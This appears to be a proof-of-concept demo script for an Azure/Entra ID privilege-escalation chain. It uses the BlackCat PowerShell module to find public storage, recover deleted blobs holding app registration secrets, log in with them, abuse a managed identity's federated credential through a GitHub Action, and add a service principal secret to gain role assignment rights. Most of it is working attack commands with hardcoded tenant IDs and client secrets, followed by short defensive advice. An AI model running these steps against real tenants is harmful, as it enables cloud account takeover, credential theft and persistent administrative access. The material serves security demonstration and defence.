This script demonstrates a practical proof-of-concept for an attack that:
- Uses a compromised App Registration to restore a deleted privileged App
- Uses that privileged App to clone a high-privilege user
- Authenticates with the new cloned user
- PowerShell 7.x
- Az PowerShell module
- Microsoft.Graph PowerShell module
- BlackCat module
- Compromised App Registration credentials with appropriate permissions
- open terminal
- Import-module Blackcat.psm1
# Show Commands
show-BlackCatCommands -Category Reconnaissance
Find-AzurePublicResource -Name bluemountainbank
Find-PublicStorageContainer -StorageAccountName bluemountainbankbackup -includeEmpty
# Show that folder is really empty
Get-PublicBlobContent -BlobUrl 'https://bluemountainbankbackup.blob.core.windows.net/config/?restype=container&comp=list' -ListOnly
# Show deleted items
Get-PublicBlobContent -BlobUrl 'https://bluemountainbankbackup.blob.core.windows.net/config/?restype=container&comp=list' -IncludeDeleted -ListOnly
#Download deleted File(s)
# Show deleted items
Get-PublicBlobContent -BlobUrl 'https://bluemountainbankbackup.blob.core.windows.net/config/?restype=container&comp=list' -IncludeDeleted -OutputPath .
We have now got a file
# Lets check the content
$content = Get-Content ./azure-ad-app-registrations.json | ConvertFrom-Json
$content.appRegistrations
# Compromised App Registration credentials
$tentandId = $content.appRegistrations[-1].tenantId
$clientId = $content.appRegistrations[-1].appId
$appSecret = $content.appRegistrations[-1].SecretValue
$tenantId = '3da86d62-c862-48da-973f-487ab98166a8'
$clientId = '0c3be057-9e1d-4b72-bf5d-555d396fee14'
$appSecret = '46Q8Q~dF1cWE5_yIFuaui8mI6iULXQHK-oFxfbs~'
# Authenticate
Connect-ServicePrincipal -TenantId $tenantId -ClientId $clientId -ClientSecret $appSecretGet-RoleAssignment -CurrentUser -OutputFormat Object# Get Entra Information
$users = Invoke-MsGraph -relativeUrl 'users' -verbose
# Show Caching
$users = Invoke-MsGraph -relativeUrl 'users' -verbose
Get-PrivilegedAppWe now know that we have contributor permissions to the UAMI
$parameters = @{
id = '/subscriptions/f6426b36-04fa-4a41-a9e4-7f13abe34d55/resourceGroups/bluemountain-banking-dev/providers/Microsoft.ManagedIdentity/userAssignedIdentities/id-bmb-rbac-dev'
GitHubOrganization = 'azurekid'
GitHubRepository = 'blackcat'
Branch = 'main'
Name = 'mc2mc'
}
Set-FederatedIdentity @parameters | fl * Clone the repository of the organization (if public) We are now going to run a GitHub Action using the Managed Identity
This uses a GitHub Action that imports the BlackCat Module and uses the Clone Function
This uses a GitHub Action that imports the BlackCat Module that adds a user to a privileged Group
@{
ObjectId = '0f3acf07-a6f6-43ac-811b-2500df32d0aa'
UseApplicationEndpoint = $true
Action = 'AddPassword'
GenerateSecret = $true
}
Set-ServicePrincipalCredential @parameters$ClientSecret = '0dP8Q~C7bIW2auZL2NFQRr4~MBItInACg.Yc1c5a'
$clientId = '51c245e2-91c0-4614-b680-b2f48ef7f540'
$tenantId = '3da86d62-c862-48da-973f-487ab98166a8'
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $clientId, $SecureStringPwd
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantIdNow that we have Role Assignment Permissions, we can become king of the castle!!!
This attack chain demonstrates how an attacker with access to a single set of App Registration credentials can:
- Exploit the recycle bin to recover potentially more powerful applications
- Use those applications to create a highly privileged user account
- Establish persistent access with full administrative rights
- Perform actions as if they were a legitimate administrator
Organizations should regularly audit their deleted applications, implement strict permissions on application restoration capabilities, and monitor for unusual user creation patterns, especially those involving high privilege roles.